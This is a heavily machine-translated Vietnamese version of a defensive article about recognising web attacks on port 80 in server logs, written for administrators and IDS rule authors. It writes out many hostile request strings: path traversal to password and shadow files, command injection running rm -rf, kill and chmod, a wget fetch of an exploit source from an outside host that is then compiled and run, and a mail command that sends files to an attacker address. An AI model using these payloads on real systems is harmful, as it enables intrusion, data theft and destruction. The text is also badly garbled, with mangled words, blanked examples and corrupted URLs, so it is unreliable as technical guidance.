I. Tóm tắt
Thứ hai. Mô tả chi tiết
III. Thêm
IV. Phân tích lan toả
V. chuyển mã
VI. Kết luận
[Tóm tắt]
80 trang web như là cổng dịch vụ mặc định, về vấn đề an ninh khác nhau của nó giữ cho phát hành, các lỗ hổng ảnh hưởng đến Yi Xie và thậm chí được khai thác để đạt được quyền quản trị để nhập Zhandianneibu, sau đây là một số trong 80 Duankou Zenomorph dấu vết bên phải của mô hình mối đe dọa nghiên cứu, và cho bạn biết làm thế nào để tìm các vấn đề từ các bản ghi log.
[Xem chi tiết]
Ở đây một phần thông qua một số Liezi hiển thị trên các máy chủ web và các ứng dụng trên tổng tấn công của họ, và dấu vết của nó, mà chỉ đại diện cho Liezi cuộc tấn công lớn, không có danh sách của tất cả các hình thức tấn công, phần này sẽ mô tả chi tiết về vai trò của mỗi tấn công, và làm thế nào để khai thác những lỗ hổng để tấn công.
(1) "" ". .." Và yêu cầu "..."
Dấu vết của các cuộc tấn công đang rất phổ biến cho các ứng dụng web và máy chủ web, mà được sử dụng để cho phép một kẻ tấn công hay một chương trình worm-virus để thay đổi đường dẫn của web server, để được truy cập vào khu vực đóng cửa. Hầu hết các chương trình CGI với các sai sót, ".." yêu cầu.
Ví dụ:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Điều này cho thấy kẻ tấn công Liezi mosd yêu cầu tập tin này, nếu kẻ tấn công mang tính đột phá khả năng máy chủ web thư mục gốc, sau đó nhận được thông tin nhiều hơn và để có được quyền ưu đãi hơn nữa.
(2) "20%" yêu cầu
20% là giá trị hex của 16 không gian đó, mặc dù điều này không có nghĩa là bạn có thể sử dụng bất cứ điều gì, nhưng khi bạn xem nhật ký sẽ tìm thấy nó, một số máy chủ ứng dụng web chạy trên nhân vật này có thể được thực hiện hiệu quả Vì vậy, bạn nên cẩn thận xem lại nhật ký. Mặt khác, theo yêu cầu đôi khi có thể giúp đỡ để thực hiện một số lệnh.
Ví dụ:
http://host/cgi-bin/lame.cgi?page=ls% | 20-al
Điều này cho thấy kẻ tấn công Liezi để thực thi một lệnh unix, liệt kê toàn bộ danh mục các văn bản yêu cầu, gây ra những kẻ tấn công để truy cập các tập tin quan trọng trên hệ thống của bạn, để giúp anh ta tiếp tục cung cấp các điều kiện để được đặc quyền.
(3) "00%" yêu cầu
00% cho biết hệ thập lục phân 16-byte trống, ông đã có thể đánh lừa các ứng dụng web, và yêu cầu các loại tập tin khác nhau.
Ví dụ:
http://host/cgi-bin/lame.cgi?page=index.html
Đây có thể là một yêu cầu hợp lệ trong máy tính, nếu một kẻ tấn công biết được yêu cầu này đã thành công, ông sẽ tiếp tục tìm các thủ tục cgi.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Có lẽ chương trình cgi không chấp nhận yêu cầu này vì nó là yêu cầu để kiểm tra các hậu tố tên file, chẳng hạn như: các loại html.shtml hoặc file khác. Hầu hết các chương trình sẽ cho bạn biết các loại tập tin yêu cầu là không hợp lệ, lần này nó sẽ nói cho các yêu cầu kẻ tấn công tập tin phải là một đặc tính của một hậu tố loại tập tin, do đó, kẻ tấn công có thể có được hệ thống đường dẫn, tên file, kết quả hệ thống của bạn có thêm thông tin nhạy cảm
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Chú ý đến yêu cầu này, nó sẽ ăn gian chương trình cgi rằng tài liệu này là để xác định loại tập tin chấp nhận được, một số ứng dụng của thanh tra có hiệu quả như yêu cầu tập tin stupid, mà thường được sử dụng các phương pháp của kẻ tấn công.
(4) "|" Yêu cầu
Đây là một nhân vật đường ống, trong hệ thống unix, một yêu cầu để được giúp đỡ trong việc thực hiện một số lệnh hệ thống cùng một lúc.
Ví dụ:
# Cát access_log | grep-i ".."
(Lệnh này sẽ hiển thị các bản ghi trong yêu cầu "" .., thường được sử dụng trong các cuộc tấn công và sâu hàng)
Thường thì thấy rằng rất nhiều các ứng dụng web sử dụng ký tự này, điều này cũng dẫn đến các báo động sai trong các bản ghi IDS.
Trong việc kiểm tra cẩn thận của ứng dụng của bạn, do đó, lợi thế của việc giảm báo động sai trong các hệ thống phát hiện xâm nhập.
Đây là một số Tzu-Liệt:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Lệnh này yêu cầu, sau đây là một số thay đổi trong Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%% 20-al 20/etc |
Yêu cầu này được liệt kê trong hệ thống Unix / etc thư mục của tất cả các file
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep-i% 20% 20 "què"
Lệnh yêu cầu thực hiện mèo và thực hiện các lệnh grep sẽ cũng có, hãy kiểm tra các lame ""
(5) "," yêu cầu
Trong các hệ thống unix, nhân vật này cho phép thực hiện nhiều dòng lệnh
Ví dụ:
# Id; uname-a
(Thực hiện lệnh id, tiếp theo là thực hiện các lệnh uname)
Một số chương trình web với nhân vật này, có thể dẫn đến IDS của bạn ghi một lời cảnh báo của sự thất bại, bạn nên cẩn thận kiểm tra chương trình web của bạn, để bạn giảm nguy cơ thất bại của các cảnh báo IDS.
(6) " " và " " Yêu cầu
Nên kiểm tra các bản ghi của bạn ghi lại hai nhân vật, một số lý do, một trong những đầu tiên là nhân vật mà thêm vào dữ liệu trong tài liệu
Ví dụ 1:
# Echo "của bạn hax0red H0 H0" / etc / motd (motd văn bản yêu cầu thông tin trong tài liệu này)
Một kẻ tấn công có thể dễ dàng sử dụng theo yêu cầu như trên giả mạo với trang web của bạn. Như RDS nổi tiếng khai thác kẻ tấn công thường được sử dụng để thay đổi các trang web.
Ví dụ 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html bạn sẽ nhận thấy rằng ngôn ngữ của dấu hiệu ở đây, ông cũng dành " "," " ký tự, các cuộc tấn công như vậy không thể gây ra những kẻ tấn công để truy cập vào hệ thống, nó lẫn lộn mọi người nghĩ rằng đây là một trang web thông tin trang web hợp pháp (dẫn đến Số người truy cập vào liên kết này để truy cập vào kẻ tấn công để thiết lập địa chỉ, yêu cầu này có thể được mã hóa thành 16 ký tự hex trong những hình thức, vì vậy mà dấu vết của cuộc tấn công không rõ ràng như vậy)
(7) "" Yêu cầu!
Ngôn ngữ thường ngày SS này yêu cầu ký tự (Server Side Bao gồm) Tôi tấn công, nếu kẻ tấn công là một kẻ tấn công gây nhầm lẫn cho người dùng nhấp vào liên kết thiết lập, và giống như ở trên.
Ví dụ:
http://host1/something.php =
Các Liệt-Tzu là một kẻ tấn công có thể làm điều đó vào một tập tin trên trang web host2 từ host1 xuất hiện phía trên (tất nhiên, yêu cầu du khách đến thăm cài đặt kết nối của kẻ tấn công. Yêu cầu này có thể được chuyển đổi thành 16 hex mã hóa mặt nạ, không phải dễ dàng tìm thấy)
Đồng thời, phương pháp này cũng có thể thực hiện lệnh trang web cơ quan
Ví dụ:
http://host/something.php =
Các Liệt-chạy trên hệ thống từ xa "id" lệnh, nó sẽ hiển thị id trang web của người dùng, thường là "không ai" hoặc "www"
Hình thức này cũng cho phép bao gồm các tập tin ẩn.
Ví dụ:
http://host/something.php =
Các tập tin ẩn. Htpasswd sẽ không được hiển thị, Apache sẽ không chịu thành lập các quy tắc đó. HT mẫu yêu cầu, và logo SSI sẽ bỏ qua hạn chế này, và gây ra vấn đề an ninh
(8) "," Yêu cầu
Yu Yong đã cố gắng để tấn công một ứng dụng web từ xa, Zhong Charu 程序 PHP, nó có thể cho phép thực thi các lệnh, nó phụ thuộc vào các thiết lập của máy chủ, và công việc khác của một số yếu tố (như php được thiết lập để bảo đảm chế độ)
Ví dụ: http://host/something.php = passthru ("id ");?
Trong một số ứng dụng php đơn giản, nó có thể đến trang web trên các quyền hệ thống người dùng từ xa để thực hiện lệnh địa phương
(9) "` "yêu cầu
nhân vật này sau đó được sử dụng để thực hiện các lệnh trong perl, các ký tự trong ứng dụng web không phải là thường được sử dụng, do đó, nếu bạn thấy nó trong đăng nhập của bạn, phải rất cẩn thận
Ví dụ:
http://host/something.cgi = `id`
Viết chương trình perl cgi trong câu hỏi sẽ dẫn tới thực hiện các lệnh id
[Thêm]
Phần sau sẽ thảo luận về việc thực hiện các cuộc tấn công nhiều hơn có thể chỉ huy, cùng với các tài liệu yêu cầu, và nếu bạn có một lỗ hổng thực thi lệnh từ xa, cần làm thế nào để kiểm tra phát hiện. Phần này chỉ là để cung cấp cho bạn một ý tưởng tốt, và nói với hệ thống của bạn những gì đang xảy ra, kẻ tấn công cố gắng để tấn công hệ thống các dấu vết của bạn, nhưng không liệt kê tất cả các kẻ tấn công sử dụng các lệnh và yêu cầu.
"/ Bin / ls"
Điều này yêu cầu chỉ huy toàn bộ con đường, trong các ứng dụng web cũng có rất nhiều lỗ hổng này, nếu bạn đăng nhập vào nhiều nơi như một yêu cầu, có thể cho lỗ hổng lớn thực hiện lệnh từ xa, nhưng không nhất thiết là một vấn đề cũng có thể là một báo động giả. Một lần nữa nhắc nhở, ứng dụng web bằng văn bản (cgi, asp, php ... vv) là cơ sở của bảo mật
Ví dụ:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% | 20-al
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Đây là một cửa sổ của vỏ, nếu một kẻ tấn công để truy cập và chạy kịch bản này, máy chủ có thể được thiết lập để cho phép các điều kiện trên máy cửa sổ để làm bất cứ điều gì, rất nhiều giun là thông qua 80 cổng, lan ra các máy tính từ xa
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Đây là hai tập tin nhị phân, các vấn đề của nó và bin / / ls, như, nếu bạn đăng nhập vào nhiều nơi như một yêu cầu, có thể cho lỗ hổng lớn thực hiện lệnh từ xa, nhưng không nhất thiết là một vấn đề cũng có thể là một báo động giả.
Nó sẽ hiển thị mà một phần thuộc về những người sử dụng và các nhóm
Ví dụ:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Lệnh này có thể xóa các tập tin mà không cần sử dụng đúng là rất nguy hiểm
Ví dụ:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% 20 * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"Wget và tftp" lệnh
Những lệnh này thường là những kẻ tấn công có thể đạt được ưu đãi hơn nữa để tải các tập tin, wget là một lệnh unix theo, có thể được sử dụng để tải backdoors, tftp là theo lệnh unix và nt, được sử dụng để tải về tập tin. Một số sâu IIS lây lan tự do tftp để sao chép các virus đến máy chủ khác
Ví dụ:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// host / cgi-bin / bad.cgi DOH = 20http% wget?: / / www.hwa-security.net/Phantasmp.c;
"Cát" lệnh
Lệnh này được dùng để xem nội dung của tập tin, dùng để đọc thông tin quan trọng như tập tin cấu hình, các tập tin mật khẩu, các tập tin tín dụng và các văn bản bạn có thể nghĩ
Ví dụ: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi DOH =? mèo 20/etc/motd%;
"Echo" lệnh
Lệnh này được sử dụng để ghi dữ liệu vào tập tin, chẳng hạn như "index.html"
Ví dụ: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-# kiwis% 20was% 20here" 20% | 200day.txt% http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-# kiwis% 20was% 20here" 20% % 200day.txt;
"Ps" lệnh
Danh sách các tiến trình đang chạy, cho biết kẻ tấn công là một máy chủ từ xa đang chạy phần mềm để có được một số ý tưởng về vấn đề bảo mật, để có được quyền truy cập thêm
Ví dụ: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% | 20-aux http://host/cgi-bin/bad. cgi DOH = ps% 20-aux?;
"Kill và killall" lệnh
Các hệ thống Unix để giết quá trình này, kẻ tấn công có thể sử dụng lệnh này để ngăn chặn các dịch vụ hệ thống và quy trình cũng có thể xóa các dấu vết của kẻ tấn công, một số khai thác sẽ sản xuất rất nhiều tiến trình con
Ví dụ: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill 20% -9% 200;
"Uname" lệnh
lệnh này cho các kẻ tấn công máy tính từ xa của tên, một thời gian, qua trang web này để biết được isp, một kẻ tấn công có thể được truy cập ngày hôm nay. Uname-a để yêu cầu bình thường, chúng sẽ được ghi lại trong log file
Ví dụ: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a http://host/cgi-bin/bad |. cgi DOH =? uname-a 20%;
"Cc, gcc, perl, python, vv ..." biên dịch / phiên dịch của lệnh
Kẻ tấn công thông qua wget hoặc tftp tải, khai thác, và sử dụng các trình biên dịch, biên dịch gcc cc này vào một chương trình thực thi, và đặc quyền truy cập hơn nữa
Ví dụ: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? DOH = gcc% 20Phantasmp.c;. / a.out% 20-p% 2.031.337;
Nếu bạn xem các mặt hàng ghi trong "python" perl "Những chỉ dẫn có thể là một kẻ tấn công từ xa để tải về perl script python,, và cố gắng để có được những đặc quyền của địa phương
"Mail" lệnh
Kẻ tấn công thường sử dụng hệ thống này chỉ huy, một số tài liệu quan trọng đến hộp thư riêng của kẻ tấn công, nhưng cũng sẵn sàng để e-mail vụ đánh bom được thực hiện
Ví dụ: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, vv ..." và các lệnh khác
Unix hệ thống để cho phép họ thay đổi các tập tin cho phép
chown = cho phép thiết lập chủ sở hữu file chmod = cho phép để thiết lập quyền truy cập file chgrp = cho phép chủ sở hữu để thay đổi các cho phép nhóm các tập tin chsh = được phép thay đổi shell của người dùng
Ví dụ: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20.777% 20index.html | http://host/cgi-bin/ bad.cgi DOH =? chmod% 20.777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. / ... / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" tập tin
Đây là tập tin mật khẩu của hệ thống, thường là bóng ra, và không cho phép để xem các mật khẩu mã hóa, nhưng các kẻ tấn công, điều này có thể biết rằng đây là những người dùng hợp lệ và hệ thống đường dẫn tuyệt đối, 等 tên trang web thông tin, nhờ thường bởi bóng tối, vì thế kẻ tấn công thường sẽ xem / etc file bóng tối /
"/ Etc / master.passwd"
Tập tin này là hệ thống BSD mật khẩu tập tin, bao gồm các mật khẩu mã hóa, các tập tin trên tài khoản người chủ chỉ là chỉ đọc, và một số kẻ tấn công không có kỹ năng sẽ mở ra bên trong anh ta cố gắng để xem nội dung., Nếu trang web là quyền người chủ để chạy, sau đó kẻ tấn công là, chúng ta có thể đọc được nội dung bên trong, rất nhiều vấn đề về quản trị hệ thống sẽ đến cái khác
"/ Etc / bóng tối"
Chứa một hệ thống mã hóa mật khẩu, đọc cùng vào tài khoản root, và / et / master.passwd gần
"/ Etc / motd"
Khi người dùng đăng nhập vào hệ thống unix, thông tin xuất hiện, trong Thông điệp "của Day" tập tin, nó cung cấp thông tin hệ thống quan trọng và quản trị của người sử dụng một số thiết lập, những người dùng muốn xem những người không, cũng chứa thông tin phiên bản hệ thống, các kẻ tấn công thường thấy tập tin này, để hiểu những gì hệ thống đang chạy trên kẻ tấn công, bước tiếp theo là để tìm kiếm các loại hệ thống, khai thác, và tiếp cận thêm cho hệ thống đặc quyền
"/ Etc / hosts"
Tài liệu này cung cấp địa chỉ IP và mạng thông tin, kẻ tấn công có thể tìm hiểu thêm về thiết lập mạng của hệ thống
"/ Usr / local / apache / conf / httpd.conf"
Đây là một máy chủ web Apache tập tin cấu hình, kẻ tấn công có thể hiểu được, như là cgi, ssi thông tin đó có thể truy cập
"/ Etc / inetd.conf"
Đây là tập tin cấu hình dịch vụ inetd, kẻ tấn công có thể tìm hiểu các máy từ xa, bắt đầu các dịch vụ, cho dù sử dụng wrapper để kiểm soát truy cập, nếu wrapper đã được tìm thấy đang chạy, kẻ tấn công bước tiếp theo sẽ kiểm tra "/ etc / hosts.allow" và "/ etc / hosts.deny", tập tin, và có thể thay đổi một số cài đặt, quyền truy cập
". Htpasswd,. Htaccess, và. Htgroup"
Những tập tin này thường được sử dụng trong xác thực người sử dụng web site, kẻ tấn công sẽ xem những tập tin này, và có được một tên người dùng và mật khẩu, các tập tin mật khẩu. Htpasswd được mã hóa, vượt qua một số quá trình giải mã đơn giản, cho phép kẻ tấn công để truy cập vào trang web các khu bảo vệ (thường là người dùng với tên người dùng và mật khẩu giống nhau, những kẻ tấn công thậm chí có thể truy cập vào tài khoản khác)
"Access_log và error_log"
Đây là những máy chủ apache file log, kẻ tấn công thường thấy những tập tin này, nhìn vào những yêu cầu được ghi nhận, những người và các yêu cầu khác đối với nhiều nơi khác nhau
Thông thường, kẻ tấn công sẽ sửa đổi các tập tin đăng nhập, chẳng hạn như thông tin địa chỉ của mình, kẻ tấn công thông qua cổng 80 qua hệ thống của bạn và hệ thống dự phòng của bạn cũng không làm việc, không có hồ sơ chương trình khác ghi lại trạng thái hệ thống, mà có thể phát hiện xâm nhập trở nên rất khó khăn để làm việc
"[Drive-thư]: winntrepairsam._ hoặc [ký tự ổ đĩa]: winntrepairsam"
Windows NT hệ thống tập tin mật khẩu, nếu các lệnh từ xa không thể được thực hiện, kẻ tấn công thường sẽ yêu cầu các tài liệu này, sau đó "l0pht crack" của các loại công cụ bẻ mật khẩu để crack, nếu kẻ tấn công cố gắng để tấn công các tập tin mật khẩu quản trị, nếu thành công sau đó máy tính từ xa sẽ là kẻ tấn công kiểm soát được
[Tràn phân tích]
Tôi sẽ không nói nhiều trong bài viết này trên tràn của chủ đề, tôi sẽ cho ra những gì mà những hiện tượng và những dấu vết của đáng chú ý và quan tâm đặc biệt, một bộ đệm thường tấn công bởi các chuyển đổi mã số kẻ tấn công và khó khăn để tìm những cách khác để đạt được
Đây là một Lie đơn giản Zi
Ví dụ: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AA
Liezi này cho biết kẻ tấn công vào một ứng dụng để gửi rất nhiều nhân vật A, để kiểm tra chương trình một lỗi tràn bộ đệm, đệm tràn có thể nhận được một khoản máy chủ lưu trữ lệnh từ xa thực hiện, nếu chủ sở hữu có setuid và thủ tục gốc, thông qua tràn vào, có thể truy cập tới toàn bộ hệ thống, nếu không thích chương trình setuid, sau đó tràn là chỉ bằng cách chạy các trang web của người sử dụng quyền
Ở đây không thể nói tất cả các trường hợp, nhưng bạn nên thường xuyên kiểm tra file bản ghi của bạn, nếu ngày hôm đó đột nhiên tìm thấy rất nhiều yêu cầu, nhưng thường không quá yêu cầu, nó có nghĩa là bạn đang bị tấn công tràn, tất nhiên, cũng có thể được Một mạng lưới sâu mới tấn công
[Chuyển mã]
Tất cả các cuộc tấn công nói trên yêu cầu, kẻ tấn công thường biết IDS hệ thống yêu cầu kiểm tra thường xuyên cơ khí, thường là kẻ tấn công sẽ sử dụng dữ liệu chuyển đổi công cụ để chuyển đổi các định dạng nội dung yêu cầu 16 ban nhạc, kết quả IDS sẽ bỏ qua những yêu cầu này, Chúng tôi rất quen thuộc với công cụ quét lỗ hổng CGI mà là một Liezi tốt râu ria. Nếu bạn xem các bản ghi thời gian tìm thấy một số lượng lớn các ban nhạc-16 và không phải một số ký tự thông thường, sau đó những kẻ tấn công có thể cố gắng sử dụng một vài cách để tấn công hệ thống của bạn
Một cách nhanh chóng để tìm thấy là các log file của bạn yêu cầu những người trong băng tần 16 của, sao chép nó vào trình duyệt của bạn, trình duyệt có thể được chuyển đổi thành các yêu cầu chính xác, và hiển thị nội dung của yêu cầu, nếu bạn không can đảm để đi nguy cơ này, một người đàn ông ASCII đơn giản, có thể cung cấp cho bạn mã chính xác.
[Kết luận]
Bài này không thể bao gồm tất cả 80 cổng của vụ tấn công, nhưng hầu hết đã được trích dẫn nhiều hơn các cuộc tấn công nói chung, và cho bạn biết làm thế nào để kiểm tra các tập tin đăng nhập của bạn, và làm thế nào để thêm như số lượng các quy tắc IDS, viết mục tiêu của cô là web quản trị hệ thống cần được quan tâm về những gì một ý tưởng tốt cùng một lúc, tôi hy vọng bài viết này giúp các nhà phát triển web web chương trình để viết chương trình tốt hơn
OF Chú ý: Nếu bạn có bất kỳ ý kiến và đề nghị, xin vui lòng gửi một admin@cgisecurity.com e-mail.